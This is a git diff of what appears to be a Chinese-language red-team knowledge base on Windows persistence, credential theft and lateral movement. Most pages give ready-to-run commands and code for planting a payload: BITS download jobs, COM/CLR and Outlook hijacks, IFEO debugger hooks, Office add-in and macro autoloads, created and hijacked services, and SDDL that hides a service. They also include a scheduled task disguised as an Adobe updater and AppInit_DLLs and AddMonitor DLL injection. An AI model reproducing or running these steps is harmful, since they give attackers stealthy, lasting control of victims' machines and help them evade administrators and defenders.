{% embed url="https://github.com/EvotecIT/PSWriteWord" caption="" %}

8
file/pe.md Normal file
View File

@ -0,0 +1,8 @@
# PE
待整理
参考文章:
{% embed url="https://bbs.pediy.com/thread-121488.htm" caption="" %}

6
get-password/inject-mstsc.exe.md Normal file
View File

@ -0,0 +1,6 @@
# 注入mstsc.exe
窃取远程桌面连接密码
{% embed url="https://github.com/0x09AL/RdpThief" caption="" %}

6
get-password/mimikatz.md Normal file
View File

@ -0,0 +1,6 @@
# Mimikatz
Mimikatz
{% embed url="https://github.com/gentilkiwi/mimikatz/" caption="" %}

6
get-password/nplogonnotify.md Normal file
View File

@ -0,0 +1,6 @@
# NPLogonNotify
参考链接:
{% embed url="https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy" caption="" %}

10
get-password/smb.md Normal file
View File

@ -0,0 +1,10 @@
# SMB
使用恶意主题来窃取密码
{% embed url="https://www.bleepingcomputer.com/news/microsoft/windows-10-themes-can-be-abused-to-steal-windows-passwords/" caption="" %}
利用恶意pdf文件来窃取密码
{% embed url="https://research.checkpoint.com/2018/ntlm-credentials-theft-via-pdf-files/" caption="" %}

6
get-password/tickets.md Normal file
View File

@ -0,0 +1,6 @@
# Tickets
Silver Tickets、Golden Tickets
{% embed url="https://en.hackndo.com/kerberos-silver-golden-tickets/" caption="" %}

8
inject/inject.md Normal file
View File

@ -0,0 +1,8 @@
# 注入
## 原理: <a id="h3--"></a>
这篇文章讲的非常详细,重新整理一遍意义不大,直接看原文吧。
{% embed url="https://www.elastic.co/cn/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" caption="" %}

2
lateral-movement/dcom.md Normal file
View File

@ -0,0 +1,2 @@
# DCOM

2
lateral-movement/hash.md Normal file
View File

@ -0,0 +1,2 @@
# HASH

2
lateral-movement/kerberos-tickets.md Normal file
View File

@ -0,0 +1,2 @@
# Kerberos tickets

2
lateral-movement/rpc.md Normal file
View File

@ -0,0 +1,2 @@
# RPC

2
lateral-movement/wmi.md Normal file
View File

@ -0,0 +1,2 @@
# WMI

2
persistence/bits-jobs/README.md Normal file
View File

@ -0,0 +1,2 @@
# BITS Jobs

18
persistence/bits-jobs/bits.md Normal file
View File

@ -0,0 +1,18 @@
# BITS
## BITS <a id="h1-bits"></a>
后台智能传输服务它可以促进文件到Web服务器HTTP和共享文件夹SMB的传输能力。
可以滥用此功能以便在受感染的主机上下载有效负载可执行文件PowerShell脚本Scriptlet等并在给定时间执行这些文件
## 新建BITS Jobs后门 <a id="h1--bits-jobs-"></a>
```text
bitsadmin /create qwqdanchun
bitsadmin /addfile qwqdanchun "http://127.0.0.1/qwqdanchun.exe" "C:\Temp\qwqdanchun.exe"
bitsadmin /SetNotifyCmdLine qwqdanchun C:\Temp\qwqdanchun.exe NUL
bitsadmin /SetMinRetryDelay "qwqdanchun" 60
bitsadmin /resume qwqdanchun
```

2
persistence/com-hijack/README.md Normal file
View File

@ -0,0 +1,2 @@
# COM劫持

100
persistence/com-hijack/com-hijack.md Normal file
View File

@ -0,0 +1,100 @@
# COM劫持
## COM组件 <a id="h1-com-"></a>
COM是Windows中的一个系统用于在操作系统和软件组件之间进行交互对各种COM对象的引用存储在注册表中。劫持COM对象需要在注册表中进行更改以替换对合法系统组件的引用这可能导致该组件在执行时不起作用。
## 劫持CLR <a id="h1--clr"></a>
CLR全称Common Language Runtime中文名称为公共语言运行时。
CLR是.NET Framework的主要执行引擎作用之一是监视程序的运行。
在CLR之下运行的程序属于managed不在CLR之下直接运行的程序属于native。
此处主要以CLR的劫持作为实例因为其本质也是COM劫持但因为本身的特殊性经常被单独拿来说。
```text
#32bit
wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="%username%",VariableValue="1"
wmic ENVIRONMENT create name="COR_PROFILER",username="%username%",VariableValue="{11111111-1111-1111-1111-111111111111}"
SET KEY=HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32
REG.EXE ADD %KEY% /VE /T REG_SZ /D "C:\Temp\qwqdanchun.dll" /F
REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F
#64bit
wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="%username%",VariableValue="1"
wmic ENVIRONMENT create name="COR_PROFILER",username="%username%",VariableValue="{11111111-1111-1111-1111-111111111111}"
SET KEY=HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32
REG.EXE ADD %KEY% /VE /T REG_SZ /D "C:\Temp\qwqdanchun.dll" /F
REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F
SET KEY=HKEY_CURRENT_USER\Software\Classes\WoW6432Node\CLSID\{11111111-1111-1111-1111-111111111111}\InProcServer32
REG.EXE ADD %KEY% /VE /T REG_SZ /D "C:\Temp\qwqdanchun.dll" /F
REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F
```
参考文章:
{% embed url="https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html" caption="" %}
## 劫持其他COM组件 <a id="h1--com-"></a>
操作的话与CLR劫持相同但是不再需要更改环境变量少了一步敏感操作具体使用自行取舍。
示例命令行:
```text
SET KEY=HKEY_CURRENT_USER\Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32
REG.EXE ADD %KEY% /T REG_SZ /D "C:\Temp\qwqdanchun.dll" /F
REG.EXE ADD %KEY% /V ThreadingModel /T REG_SZ /D Apartment /F
```
原理类似故只列出常用的几个CLSID。
| CLSID |
| :--- |
| {42aedc87-2188-41fd-b9a3-0c966feabec1} |
| {fbeb8a05-beee-4442-804e-409d6c4515e9} |
| {b5f8350b-0548-48b1-a6ee-88bd00b4a5e7} |
| {BCDE0395-E52F-467C-8E3D-C4579291692E} |
| {F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1} |
| {3543619C-D563-43f7-95EA-4DA7E1CC396A} |
| {B056521A-9B10-425E-B616-1FCD828DB3B1} |
| {EFEF7FDB-0CED-4FB6-B3BB-3C50D39F4120} |
| {93E5752E-B889-47C5-8545-654EE2533C64} |
| {56FDF344-FD6D-11D0-958A-006097C9A090} |
| {2163EB1F-3FD9-4212-A41F-81D1F933597F} |
| {A6A2383F-AD50-4D52-8110-3508275E77F7} |
| {F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3} |
| {88D96A05-F192-11D4-A65F-0040963251E5} |
| {807583E5-5146-11D5-A672-00B0D022E945} |
| {529A9E6B-6587-4F23-AB9E-9C7D683E3C50} |
| {3CE74DE4-53D3-4D74-8B83-431B3828BA53} |
| {A4B544A1-438D-4B41-9325-869523E2D6C7} |
| {33C53A50-F456-4884-B049-85FD643ECFED} |
| {C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6} |
| {275C23E2-3747-11D0-9FEA-00AA003F8646} |
| {C15BB852-6F97-11D3-A990-00104B2A619F} |
| {ED475410-B0D6-11D2-8C3B-00104B2A6676} |
| {1299CF18-C4F5-4B6A-BB0F-2299F0398E27} |
| {DCB00C01-570F-4A9B-8D69-199FDBA5723B} |
| {C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6} |
| {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} |
自行寻找的话只需要去看下面两个注册表位置即可
```text
HKCU\Software\Classes\CLSID\HKCU\Software\Classes\Wow6432Node\CLSID\
```
## 一些特殊技巧 <a id="h1-u4E00u4E9Bu7279u6B8Au6280u5DE7"></a>
TreatAs可以模拟其他类的CLSID。
{% embed url="https://docs.microsoft.com/en-us/windows/win32/com/treatas" caption="" %}
利用零宽字节特性在Process Explorer等分析软件中隐藏劫持dll
{% embed url="https://en.wikipedia.org/wiki/Zero-width\_space" caption="" %}
{% embed url="https://fatrodzianko.com/2020/03/08/dll-side-loading-and-zero-width-spaces/" caption="" %}

2
persistence/dll-hijack/README.md Normal file
View File

@ -0,0 +1,2 @@
# DLL劫持

57
persistence/dll-hijack/hijack-.net-program.md Normal file
View File

@ -0,0 +1,57 @@
# 劫持.NET程序
## 劫持.NET程序AppDomainManager
### 首先制作要加载的恶意程序 <a id="h3-u9996u5148u5236u4F5Cu8981u52A0u8F7Du7684u6076u610Fu7A0Bu5E8F"></a>
C\#
```csharp
using System;
using System.Windows.Forms;
public sealed class MyAppDomainManager : AppDomainManager
{
public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
{
MessageBox.Show("AppDomainManager Injection");
return;
}
}
```
之后将其编译为qwqdanchun.dll。
### 注入方法一: <a id="h3--"></a>
命令行设置环境变量:
```text
set APPDOMAIN_MANAGER_ASM=qwqdanchun, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
set APPDOMAIN_MANAGER_TYPE=MyAppDomainManager
```
之后将qwqdanchun.dll与.net文件放在同一目录即可。
### 注入方法二: <a id="h3--"></a>
寻找要注入的exe文件此处示例使用qwqdanchun.exe并将做好的dll与其置于同一目录再将如下配置文件写入qwqdanchun.exe.config文件即可。
```markup
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0"/>
</startup>
<runtime>
<appDomainManagerAssembly value="qwqdanchun, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" />
<appDomainManagerType value="MyAppDomainManager" />
</runtime>
</configuration>
```
参考文章:
{% embed url="https://web.archive.org/web/20170919060201/http://subt0x10.blogspot.com/2017/06/attacking-clr-appdomainmanager-injection.html" caption="" %}
{% embed url="https://pentestlaboratories.com/tag/appdomainmanager-injection/" caption="" %}

1603
persistence/dll-hijack/hijack-autorun-programs.md Normal file
View File

File diff suppressed because it is too large Load Diff

2
persistence/image-file-execution-options/README.md Normal file
View File

@ -0,0 +1,2 @@
# 映像劫持

32
persistence/image-file-execution-options/image-file-execution-options.md Normal file
View File

@ -0,0 +1,32 @@
# 映像劫持
## 劫持程序退出事件 <a id="h3-u52ABu6301u7A0Bu5E8Fu9000u51FAu4E8Bu4EF6"></a>
命令行
```text
# Use notepad as example
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\Temp\qwqdanchun.exe"
```
## 劫持程序调试选项 <a id="h3-u52ABu6301u7A0Bu5E8Fu8C03u8BD5u9009u9879"></a>
命令行
```text
copy C:\Temp\qwqdanchun.exe C:\Windows\System32\qwqdanchun.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /d "qwqdanchun.exe"
```
参考文章:
{% embed url="https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/" caption="" %}
{% embed url="https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/" caption="" %}

2
persistence/office/README.md Normal file
View File

@ -0,0 +1,2 @@
# Office

23
persistence/office/com-hijack.md Normal file
View File

@ -0,0 +1,23 @@
# COM劫持
Outlook在启动时会加载多个COM对象我们可以通过修改注册表的方式劫持Outlook的启动过程用来加载DLL。
```text
#32bit office on 32bit windows/64bit office on 64bit windows
reg add HKCU\Software\Classes\CLSID\{84DA0A92-25E0-11D3-B9F7-00C04F4C8F5D}\TreatAs /t REG_SZ /d "{49CBB1C7-97D1-485A-9EC1-A26065633066}" /f
reg add HKCU\Software\Classes\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066} /t REG_SZ /d "Mail Plugin" /f
reg add HKCU\Software\Classes\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32 /t REG_SZ /d "C:\Temp\qwqdanchun.dll" /f
reg add HKCU\Software\Classes\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32 /v ThreadingModel /t REG_SZ /d "Apartment" /f
#32bit office on 64bit windows
reg add HKCU\Software\Classes\Wow6432Node\CLSID\{84DA0A92-25E0-11D3-B9F7-00C04F4C8F5D}\TreatAs /t REG_SZ /d "{49CBB1C7-97D1-485A-9EC1-A26065633066}" /f
reg add HKCU\Software\Classes\Wow6432Node\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066} /t REG_SZ /d "Mail Plugin" /f
reg add HKCU\Software\Classes\Wow6432Node\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32 /t REG_SZ /d "C:\Temp\qwqdanchun.dll" /f
reg add HKCU\Software\Classes\Wow6432Node\CLSID\{49CBB1C7-97D1-485A-9EC1-A26065633066}\InprocServer32 /v ThreadingModel /t REG_SZ /d "Apartment" /f
```
参考文章:
{% embed url="https://www.welivesecurity.com/2018/08/22/turla-unique-outlook-backdoor/" caption="" %}
{% embed url="https://3gstudent.github.io/3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-Outlook/" caption="" %}

41
persistence/office/macro-enabled-add-in-file.md Normal file
View File

@ -0,0 +1,41 @@
# 模板文件
下文中的xlam、xla、ppam、ppa文件均为office模板文件在其中添加宏可以实现在打开文件时自动加载模板并执行宏的效果此处是一个简单的调用exe的宏示例
```text
Sub Auto_Open()
Set objShell = CreateObject("Wscript.Shell")
objShell.Exec ("C:\Temp\qwqdanchun.exe")
End Sub
```
## EXCEL VBA <a id="h3-excel-vba"></a>
命令行:
```text
#xlam
COPY C:\Temp\qwqdanchun.xlam %appdata%\Microsoft\Excel\XLSTART\qwqdanchun.xlam
#xla
COPY C:\Temp\qwqdanchun.xla %appdata%\Microsoft\Excel\XLSTART\qwqdanchun.xla
```
打开Excel时无论是新建的电子表格还是以前保存的电子表格都将执行该加载项。
## POWERPOINT VBA <a id="h3-powerpoint-vba"></a>
可以使用与Excel相同的方式来创建PowerPoint VBA加载项
```text
#ppam
COPY C:\Temp\qwqdanchun.ppam %appdata%\Microsoft\AddIns\qwqdanchun.ppam
reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\PowerPoint\AddIns\qwqdanchun" /v Autoload /t REG_DWORD /d 1 /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\PowerPoint\AddIns\qwqdanchun" /v Path /t REG_DWORD /d "qwqdanchun.ppam" /f
#ppa
COPY C:\Temp\qwqdanchun.ppa %appdata%\Microsoft\AddIns\qwqdanchun.ppa
reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\PowerPoint\AddIns\qwqdanchun" /v Autoload /t REG_DWORD /d 1 /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\PowerPoint\AddIns\qwqdanchun" /v Path /t REG_DWORD /d "qwqdanchun.ppa" /f
```

8
persistence/office/vsto.md Normal file
View File

@ -0,0 +1,8 @@
# VSTO
参考文章:
{% embed url="https://bohops.com/2018/01/31/vsto-the-payload-installer-that-probably-defeats-your-application-whitelisting-rules/" caption="" %}
{% embed url="https://vanmieghem.io/stealth-outlook-persistence/" caption="" %}

28
persistence/office/wll-xll.md Normal file
View File

@ -0,0 +1,28 @@
# WLL/XLL
## WLL <a id="h3-wll"></a>
是指“.wll”扩展名的“Word加载项”。这是一个Word 97时代的老东西但似乎仍受支持。“.wll”文件本质上是具有Office特定扩展名的DLL。这意味着它支持基本的DLL功能因此您可以将“.dll”重命名为“.wll”来使用。
命令行:
```text
copy C:\Temp\qwqdanchun.dll %APPDATA%\Microsoft\Word\Startup\qwqdanchun.wll
```
## XLL <a id="h3-xll"></a>
类似于WLL也是具有Office特定扩展名的DLL适用于Excel。但是其dll构造时注意要将恶意代码放在导出函数“xlAutoOpen”中来保证其被加载。
命令行:
```text
copy C:\Temp\qwqdanchun.dll %APPDATA%\Microsoft\AddIns\qwqdanchun.xll
#remember to change “15.0” to your version
reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\Options" /v OPEN /t REG_SZ /d "/R qwqdanchun.xll”
```
参考文章:
{% embed url="https://labs.f-secure.com/archive/add-in-opportunities-for-office-persistence/" caption="" %}

2
persistence/rootkit/README.md Normal file
View File

@ -0,0 +1,2 @@
# Rootkit

26
persistence/rootkit/rootkit.md Normal file
View File

@ -0,0 +1,26 @@
# Rootkit
此处仅讨论狭义的Rootkit也就是通过加载驱动进入r0实现的权限维持。
## 方法一: <a id="h3--"></a>
利用现有驱动漏洞实现获取ring0权限并长期驻留。
## 方法二: <a id="h3--"></a>
自己制作驱动,并添加数字签名,以加载进系统,并驻留。
## 备注: <a id="h3--"></a>
无论是挖掘漏洞还是自己写驱动都需要多方面的知识所以此处无法列出合适的POC但是我会将一些相关资料列在下方有兴趣的同学可以自己学习。
开源实例:
{% embed url="https://github.com/uf0o/rootkit-arsenal-guacamole" caption="" %}
参考文章:
{% embed url="https://en.wikipedia.org/wiki/Rootkit" caption="" %}
{% embed url="https://bbs.pediy.com/thread-260708.htm" caption="" %}

2
persistence/schtasks/README.md Normal file
View File

@ -0,0 +1,2 @@
# 计划任务

24
persistence/schtasks/add-schtasks.md Normal file
View File

@ -0,0 +1,24 @@
# 新建任务
命令行:
```text
# On System Startschtasks /create /tn qwqdanchun /tr "c:\Temp\qwqdanchun.exe" /sc onstart /ru System# On User Idle (30mins)schtasks /create /tn qwqdanchun /tr "c:\Temp\qwqdanchun.exe" /sc onidle /i 30# On User Loginschtasks /create /tn qwqdanchun /tr "c:\Temp\qwqdanchun.exe" /sc onlogon /ru System
```
Powershell
```text
$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c c:\Temp\qwqdanchun.exe"$T = New-ScheduledTaskTrigger -AtLogOn -User "qwqdanchun"$P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest$S = New-ScheduledTaskSettingsSet$P = New-ScheduledTaskPrincipal "qwqdanchun"$D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $SRegister-ScheduledTask qwqdanchun -InputObjec $D
```
C\#
```text
using Microsoft.Win32.TaskScheduler;using System;namespace demo{ static class Program { static void Main() { TaskService ts = new TaskService(); TaskDefinition td = ts.NewTask(); td.RegistrationInfo.Description = "This task keeps your Adobe Reader and Acrobat applications up to date with the latest enhancements and security fixes"; td.RegistrationInfo.Author = "Adobe Scheduler"; TimeTrigger dt = new TimeTrigger(); dt.StartBoundary = Convert.ToDateTime(DateTime.Now.ToString("yyyy-MM-dd 06:30:00")); dt.Repetition.Interval = TimeSpan.FromMinutes(5); td.Triggers.Add(dt); td.Settings.DisallowStartIfOnBatteries = false; td.Settings.RunOnlyIfNetworkAvailable = true; td.Settings.RunOnlyIfIdle = false; td.Settings.DisallowStartIfOnBatteries = false; td.Actions.Add(new ExecAction(@"c:\Temp\qwqdanchun.exe", "", null)); ts.RootFolder.RegisterTaskDefinition(@"Adobe Acrobat Update Task", td); } }}
```
参考文章:
{% embed url="https://docs.microsoft.com/zh-cn/windows/win32/taskschd/using-the-task-scheduler" caption="" %}

2
persistence/service/README.md Normal file
View File

@ -0,0 +1,2 @@
# 服务

16
persistence/service/edit-service.md Normal file
View File

@ -0,0 +1,16 @@
# 修改服务
修改Fax服务文件路径
```text
sc config Fax binPath= "C:\Temp\qwqdanchun.exe" start="auto" obj="LocalSystem"
sc start Fax
```
```text
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Fax" /v ImagePath /t REG_SZ /d "C:\Temp\qwqdanchun.exe" /f
```

20
persistence/service/hide-service.md Normal file
View File

@ -0,0 +1,20 @@
# 隐藏服务
隐藏:
```text
sc.exe sdset qwqdanchun "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
```
恢复:
```text
sc.exe sdset qwqdanchun "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
```
参考文章:
{% embed url="https://www.freebuf.com/articles/system/254838.html" caption="" %}
{% embed url="https://www.sans.org/blog/red-team-tactics-hiding-windows-services/" caption="" %}

12
persistence/service/hijack-service.md Normal file
View File

@ -0,0 +1,12 @@
# 劫持服务
劫持关闭事件:
```text
#REG
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Fax" /v FailureCommand /t REG_SZ /d "C:\Temp\qwqdanchun.exe" /f
#SC
sc failure Fax command= "\"C:\Temp\qwqdanchun.exe\""
```

18
persistence/service/new-service.md Normal file
View File

@ -0,0 +1,18 @@
# 新建服务
1.命令行创建
```text
sc create qwqdanchun binpath= "cmd.exe /k C:\Temp\qwqdanchun.exe" start="auto" obj="LocalSystem"
sc start qwqdanchun
```
2.Powershell
```text
New-Service -Name "qwqdanchun" -BinaryPathName "C:\Temp\qwqdanchun.exe" -Description "Service by qwqdanchun" -StartupType Automatic
sc start qwqdanchun
```

2
persistence/startup/README.md Normal file
View File

@ -0,0 +1,2 @@
# 启动项

11
persistence/startup/folder.md Normal file
View File

@ -0,0 +1,11 @@
# 文件夹
| 目录 |
| :--- |
| shell:startup |
| %appdata%\Microsoft\Windows\Start Menu\Programs\Startup |
| C:\Users\USERNAME\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup |
| shell:common startup |
| %programdata%\Microsoft\Windows\Start Menu\Programs\Startup |
| C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp |

78
persistence/startup/registry.md Normal file
View File

@ -0,0 +1,78 @@
# 注册表
Flag等有时间每一条都写个poc或者解释下利用方法
| 注册表项 |
| :--- |
| HKCU\Environment\UserInitMprLogonScript |
| HKCU\Software\Classes\*\ShellEx\ContextMenuHandlers |
| HKCU\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers |
| HKCU\Software\Classes\Directory\ShellEx\ContextMenuHandlers |
| HKCU\Software\Classes\Directory\Shellex\DragDropHandlers |
| HKCU\Software\Classes\Drive\ShellEx\ContextMenuHandlers |
| HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Run |
| HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon |
| HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\Shell |
| HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
| HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce |
| HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceEx |
| HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices |
| HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce |
| HKCU\Software\Microsoft\WindowsNT\CurrentVersion\Windows |
| HKCU\Software\Policies\Microsoft\Windows\System\Scripts |
| HKCU\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run |
| HKLM\Software\Classes\*\ShellEx\PropertySheetHandlers |
| HKLM\Software\Classes\CLSID{083863F1-70DE-11d0-BD40-00A0C911CE86}\Instance |
| HKLM\Software\Classes\CLSID{7ED96837-96F0-4812-B211-F13C24117ED3}\Instance |
| HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers |
| HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers |
| HKLM\Software\Classes\Directory\Shellex\CopyHookHandlers |
| HKLM\Software\Classes\Directory\Shellex\DragDropHandlers |
| HKLM\Software\Classes\Filter |
| HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers |
| HKLM\Software\Classes\Folder\ShellEx\DragDropHandlers |
| HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components |
| HKLM\Software\Microsoft\Rpc\Extensions |
| HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 |
| HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers |
| HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon |
| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler |
| HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers |
| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellServiceObjects |
| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
| HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce |
| HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx |
| HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices |
| HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce |
| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad |
| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad |
| HKLM\Software\Policies\Microsoft\Windows\System\Scripts |
| HKLM\Software\Wow6432Node\Classes\*\ShellEx\ContextMenuHandlers |
| HKLM\Software\Wow6432Node\Classes\*\ShellEx\PropertySheetHandlers |
| HKLM\Software\Wow6432Node\Classes\CLSID{083863F1-70DE-11d0-BD40-00A0C911CE86}\Instance |
| HKLM\Software\Wow6432Node\Classes\CLSID{7ED96837-96F0-4812-B211-F13C24117ED3}\Instance |
| HKLM\Software\Wow6432Node\Classes\Directory\Background\ShellEx\ContextMenuHandlers |
| HKLM\Software\Wow6432Node\Classes\Directory\ShellEx\ContextMenuHandlers |
| HKLM\Software\Wow6432Node\Classes\Directory\Shellex\DragDropHandlers |
| HKLM\Software\Wow6432Node\Classes\Drive\ShellEx\ContextMenuHandlers |
| HKLM\Software\Wow6432Node\Classes\Folder\ShellEx\ContextMenuHandlers |
| HKLM\Software\Wow6432Node\Classes\Folder\ShellEx\DragDropHandlers |
| HKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components |
| HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32 |
| HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler |
| HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers |
| HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellServiceObjects |
| HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run |
| HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad |
| HKLM\System\CurrentControlSet\Control\Lsa\ |
| HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages |
| HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages |
| HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors |
| HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors |
| HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls |
| HKLM\System\CurrentControlSet\Services\W32Time\TimeProviders\ |
| HKLM\System\CurrentControlSet\Services |
| HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol\_Catalog9\Catalog\_Entries |
| HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol\_Catalog9\Catalog\_Entries64 |
| HKU\*\software\microsoft\windows\currentversion\explorer\user shell folders\startup |

2
persistence/uncatelogued/README.md Normal file
View File

@ -0,0 +1,2 @@
# 未分类

34
persistence/uncatelogued/addmonitor.md Normal file
View File

@ -0,0 +1,34 @@
# AddMonitor
AddMonitor\(\)函数可用于安装本地端口监视器并配置连接、数据和监视器文件。此函数能够将DLL注入spoolsv.exe进程以在系统上实现持久性。
C++
```cpp
#include "stdafx.h"
#include "Windows.h"
int main() {
MONITOR_INFO_2 monitorInfo;
TCHAR env[12] = TEXT("Windows x64");
TCHAR name[12] = TEXT("evilMonitor");
TCHAR dll[12] = TEXT("qwqdanchun.dll");
monitorInfo.pName = name;
monitorInfo.pEnvironment = env;
monitorInfo.pDLLName = dll;
AddMonitor(NULL, 2, (LPBYTE)&monitorInfo);
return 0;
}
//Compile to monitor.exe and move your evil DLL to %systemroot% then run the compiled monitor.exe
```
```text
#Then run this command
reg add "hklm\system\currentcontrolset\control\print\monitors\Pentestlab" /v "Driver" /t REG_SZ /d "qwqdanchun.dll" /f
```
参考文章:
{% embed url="https://www.ired.team/offensive-security/persistence/t1013-addmonitor" caption="" %}
{% embed url="https://docs.microsoft.com/en-us/windows/win32/printdocs/addmonitor" caption="" %}

14
persistence/uncatelogued/appinit-dlls-inject.md Normal file
View File

@ -0,0 +1,14 @@
# AppInit\_DLLs注入
User32.dll被加载到进程时会加载”HKEY\_LOCAL\_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows”中Appinit\_Dlls的值修改其值可以使其加载恶意的脚本
```text
#Win10
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Appinit_Dlls /t REG_SZ /d "c:\Temp\qwqdanchun.dll" /f
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 0x1 /f
#others
